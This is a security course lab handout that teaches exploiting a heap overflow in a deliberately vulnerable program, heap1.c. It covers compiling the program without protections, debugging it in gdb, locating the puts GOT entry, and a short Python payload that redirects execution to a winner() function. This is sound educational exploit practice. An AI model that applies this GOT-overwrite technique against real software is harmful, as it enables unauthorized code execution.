Proj 8: Heap Overflow via Data Overwrite (10 pts.)

What You Need

A 32-bit x86 Kali Linux machine, real or virtual. The project was written on Kali 2.

Purpose

To practice exploiting heap overflow vulnerability. Since the heap doesn't store anything that directly ends up in EIP, you must exploit the heap to change a return pointer.

Compiling a Vulnerable Program

This program just echoes back text from its command-line argument.

In Kali, in a Terminal window, execute these commands:


curl https://samsclass.info/127/proj/heap1.c > heap1.c

gcc heap1.c -no-pie -w -g -fno-stack-protector -z norelro -z execstack -o heap1

./heap1 AAA BBB

./heap1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA BBBB
As shown below, running the program with two short arguments works, showing a "and that's a wrap folks!" message, but running it with a long first parameter "Segmentation fault".

Fuzzing

Try strings of various lengths, as shown below. You will find that 24 bytes in the first parameter are sufficient to cause a crash.

Examining the Source Code

In Kali, in a Terminal window, execute these commands:

nano heap1.c
An object named "internet" is defined, which contains an integer (4 bytes) and a pointer to a string (4 bytes).

There's a function named winner(). As you might expect, our goal is to execute that function.

Scroll down to see the rest of heap1.c, as shown below.

The program creates two objects of type "internet" on the heap with malloc().

Then it copies the two command-line arguments into the strings in those objects without checking the input length.

Debugging the Program

Execute these commands to run the program in the gdb debugger, send the attack to it, and examine the registers.

gdb -q ./heap1
run AAAABBBBCCCCDDDDEEEEFFFF GGGG
info registers
x/2i $eip
As shown below, the program crashes with:

This means we can write to any memory location we wish, putting the data in place of 'GGGG' and the address in place of 'HHHH'.

Choosing a Write Address

Let's find an address to overwrite.

Execute this command:


disassemble main
Press Enter to move down to the end of the code, as shown below (your addresses will be different). There are two calls to strcpy and then one to puts.

Execute these commands to leave the debugger.


q
y
Let's view the Dynamic Relocation entries with objdump:

objdump -R ./heap1
As shown below, when I did it, the address of "puts" was stored at 0x080498a0.

Your address will be different. Make a note of the correct address on your system.

If we can write to that address, we can take over the program's execution when it calls "puts@plt".

Note: "objdump -d ./heap1" shows a different address for "puts", also used in relocating functions, but you cannot write to that one--it will cause a segmentation fault.

Disassembling winner()

Execute these commands:

gdb ./heap1

disassemble winner

q

y
As shown below, when I did it, this function started at address 0x080484bb.

Your address will be different. Make a note of the correct address on your system.

Writing a Python Exploit File


nano h11
In nano, enter this code, to overwrite the return pointer with the start of winner().

You will have to adjust the addresses to be correct for your system.


#!/usr/bin/python

print 'AAAABBBBCCCCDDDDEEEE' + '\xa0\x98\x04\x08' + ' ' +'\xbb\x84\x04\x08' 

Save the file with Ctrl+X, Y, Enter.

Running the Exploit

Execute these commands:

chmod a+x h11

./heap1 $(./h11)
You should see the "and we have a winner" message, as shown below.

Saving a Screen Image

Make sure the "and we have a winner" message is visible, as shown above.

Click on the host system's desktop to make it active.

Press the PrintScrn key to copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the document with the filename "YOUR NAME Proj 8", replacing "YOUR NAME" with your real name.

Turning in your Project

Email the image to cnit.127sam@gmail.com with the subject line: Proj 8 from YOUR NAME

Sources

https://www.vulnhub.com/series/exploit-exercises,11/#

https://csg.utdallas.edu/wp-content/uploads/2012/08/Heap-Based-Exploitation.pdf

https://www.mattandreko.com/2012/01/12/exploit-exercises-protostar-heap-1/


Posted 9-17-15 by Sam Bowne
Revised 2-14-17
-no-pie switch added 2-20-18
Minor formatting edits 2-23-18
Tested on Kali 2018.3x86 and it worked OK 9-22-18